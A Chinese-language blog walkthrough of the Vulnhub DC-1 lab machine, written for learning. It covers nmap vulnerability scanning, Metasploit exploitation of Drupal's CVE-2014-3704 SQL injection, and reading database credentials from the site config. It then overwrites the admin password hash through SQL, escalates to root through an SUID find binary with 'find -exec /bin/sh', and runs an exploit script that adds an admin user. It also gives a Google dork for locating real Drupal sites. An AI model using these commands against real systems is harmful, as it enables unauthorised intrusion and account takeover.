天道酬勤

【Vulnhub靶机】—— DC-1

主机发现

我们使用netdiscover搜寻局域网内的主机。

 

利用Nmap192.168.234.176进行端口探测

nmap -Pn -A 192.168.234.176 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-05 08:45 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.234.176
Host is up (0.00040s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.234.176
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.234.176:80/
|     Form id: user-login-form
|     Form action: /node?destination=node
|     
|     Path: http://192.168.234.176:80/node?destination=node
|     Form id: user-login-form
|     Form action: /node?destination=node
|     
|     Path: http://192.168.234.176:80/user/password
|     Form id: user-pass
|     Form action: /user/password
|     
|     Path: http://192.168.234.176:80/user/register
|     Form id: user-register-form
|     Form action: /user/register
|     
|     Path: http://192.168.234.176:80/user/
|     Form id: user-login
|     Form action: /user/
|     
|     Path: http://192.168.234.176:80/user
|     Form id: user-login
|_    Form action: /user
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /UPGRADE.txt: Drupal file
|   /INSTALL.txt: Drupal file
|   /INSTALL.mysql.txt: Drupal file
|   /INSTALL.pgsql.txt: Drupal file
|   /: Drupal version 7 
|   /README: Interesting, a readme.
|   /README.txt: Interesting, a readme.
|   /0/: Potentially interesting folder
|_  /user/: Potentially interesting folder
|_http-server-header: Apache/2.2.22 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2014-3704: 
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704
|         The expandArguments function in the database abstraction API in
|         Drupal core 7.x before 7.32 does not properly construct prepared
|         statements, which allows remote attackers to conduct SQL injection
|         attacks via an array containing crafted keys.
|           
|     Disclosure date: 2014-10-15
|     References:
|       https://www.drupal.org/SA-CORE-2014-005
|       http://www.securityfocus.com/bid/70595
|       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3704
| vulners: 
|   cpe:/a:apache:http_server:2.2.22: 
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-7668	7.5	https://vulners.com/cve/CVE-2017-7668
|     	CVE-2017-3169	7.5	https://vulners.com/cve/CVE-2017-3169
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	CVE-2013-2249	7.5	https://vulners.com/cve/CVE-2013-2249
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2013-1862	5.1	https://vulners.com/cve/CVE-2013-1862
|     	CVE-2014-0231	5.0	https://vulners.com/cve/CVE-2014-0231
|     	CVE-2014-0098	5.0	https://vulners.com/cve/CVE-2014-0098
|     	CVE-2013-6438	5.0	https://vulners.com/cve/CVE-2013-6438
|     	CVE-2013-5704	5.0	https://vulners.com/cve/CVE-2013-5704
|     	CVE-2016-4975	4.3	https://vulners.com/cve/CVE-2016-4975
|     	CVE-2013-1896	4.3	https://vulners.com/cve/CVE-2013-1896
|     	CVE-2012-4558	4.3	https://vulners.com/cve/CVE-2012-4558
|     	CVE-2012-3499	4.3	https://vulners.com/cve/CVE-2012-3499
|     	CVE-2016-8612	3.3	https://vulners.com/cve/CVE-2016-8612
|_    	CVE-2012-2687	2.6	https://vulners.com/cve/CVE-2012-2687
111/tcp open  rpcbind 2-4 (RPC #100000)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36232/udp   status
|   100024  1          44155/tcp   status
|   100024  1          44611/udp6  status
|_  100024  1          53919/tcp6  status
MAC Address: 00:0C:29:BD:B2:2E (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.40 ms 192.168.234.176

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 239.82 seconds```

在扫描的过程中,使用了nmap的vuln脚本,这个脚本用于检测目标主机是否有常见的漏洞。

从扫描的结果来看,我们得到该机器开放的80端口,搭建了一个CMS为Drupal的网站,Drupal的版本为7,可以看到有很多的漏洞。

写一些小拓展

我们可以在谷歌中使用Google Hack,大量查找Drupal的网站,语法为inurl:"q=user/password"

我们在实战中为快速得知Drupal的版本,我们可以在robots.txt中查找MAINTAINERS.txt文件,该文件中会泄露版本号。

漏洞探测

我们在kali中使用searchsploit对drupal进行查找可以利用的漏洞。

“searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。

SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-DB二进制文件中找到。

searchsploit Drupal

漏洞利用

searchsploit的结果中看到几个漏洞可以通过msf进行利用。

打开msf,搜寻exp

use 4

info查看exp详细的信息

我们的目标网站刚好处在可利用范围内

set rhosts 192.168.234.176设置好目标机器的IP

exploit利用漏洞

目标机器上线,漏洞利用成功。

exp设置要注意几点

通常我们的web服务都是搭建在80端口,所以该exp默认帮我们填写了80端口。如果该web服务不在80端口而在888端口,则我们需要将端口设置为888。另外关于targeturi,如果该cms在搭建在/abc目录下,则需要设置targeturi/abc

查找flag

Flag1

执行ls命令,找到flag1

cat flag1.txt

Every good CMS needs a config file – and so do you.

也就是让我们寻找web的配置文件,显而易见

Flag2

cat web.config,发现啥也没有。忽然想起是CMS的配置文件。

然后,查找了一番,最终确定要找的配置文件为www/sites/default中的settings.php

flag2

Brute force and dictionary attacks aren’t the only ways to gain access (and you WILL need access). What can you do with these credentials?

暴力和字典攻击并不是获得访问权限的唯一方法(而且您需要访问权限)。你能用这些证件做什么?

在flag2的下面找到了mysql数据库的用户名和密码,我们可以尝试登录mysql去获取账号和密码。

Flag3

利用python -c '__import__("pty").spawn("/bin/bash")',获取交互shell。

登录mysql

mysql -u dbuser -p

数据库查询

show database;列出当前所有的数据库

use drupaldb进入指定的数据库

show tables;查询表

我们最关注的应该就属user表了,所以直奔主题。

在flag2中提示到,破解不是唯一的办法。在这里我们可以直接利用update修改admin的密码,但由于该密码是加密的,所以我们也需要找到相对应的加密脚本

利用quit命令退出mysql。

最终在网站目录下的scripts中找到了加密脚本

www-data@DC-1:/var/www/scripts$ ls
ls
code-clean.sh  drupal.sh	    generate-d6-content.sh  run-tests.sh
cron-curl.sh   dump-database-d6.sh  generate-d7-content.sh  test.script
cron-lynx.sh   dump-database-d7.sh  password-hash.sh
www-data@DC-1:/var/www/scripts$ ./password-hash.sh
./password-hash.sh

Generate Drupal password hashes from the shell.

Usage:        password-hash.sh [OPTIONS] "<plan-text password>"
Example:      password-hash.sh "mynewpassword"

All arguments are long options.

  --help      Print this page.

  --root <path>

              Set the working directory for the script to the specified path.
              To execute this script this has to be the root directory of your
              Drupal installation, e.g. /home/www/foo/drupal (assuming Drupal
              running on Unix). Use surrounding quotation marks on Windows.

  "<password1>" ["<password2>" ["<password3>" ...]]

              One or more plan-text passwords enclosed by double quotes. The
              output hash may be manually entered into the {users}.pass field to
              change a password via SQL to a known value.

To run this script without the --root argument invoke it from the root directory
of your Drupal installation as

  ./scripts/password-hash.sh

这里遇到了点小问题,怎么加密也不成功,结果在用法里发现

若不是以root权限运行脚本,则需要从网站的根目录去进行调用./scripts/password-hash.sh "admin"

得到$S$D9vVemNX8fwUjNNOyw/ZcvWaPH7LeE5FNO.cf5EjDKqCzref/wA2

更新管理员密码

返回mysql

update users set pass='$S$D9vVemNX8fwUjNNOyw/ZcvWaPH7LeE5FNO.cf5EjDKqCzref/wA2' where uid=1;

以新密码登录admin账号,找到flag3

Flag4

在摸索hash脚本的时候无意发现的,按照常理的话,/etc/passwd中也可发现。

位于/home目录下

提示我们需要进行提权,才能得到flag5。

Flag5

利用flag3中的提示,使用find -exec

搜索suid权限的程序:

find / -user root -perm -4000 -print 2>/dev/null

find / type f -perm -u=s 2>/dev/null

最终发现find具有root权限

find ./ -exec “whoami” \;以root权限运行whoami

find ./ -exec “/bin/sh” \;

现在已经到手root权限

靶机完成。

&Flag3另外一种方法

searchsploit的查询结果中,发现了

我们可以利用此脚本,再给其添加一个管理员以查看flag3.

python 34992.py -t http://192.168.234.176/ -u admin123 -p admin123

 

赞(2) 打赏
未经允许不得转载:HackerGu‘s Blog » 【Vulnhub靶机】—— DC-1
分享到: 更多 (0)

评论 抢沙发

评论前必须登录!

 

专注黑客技术的研究

联系我们联系我们

觉得文章有用就打赏一下文章作者

微信扫一扫打赏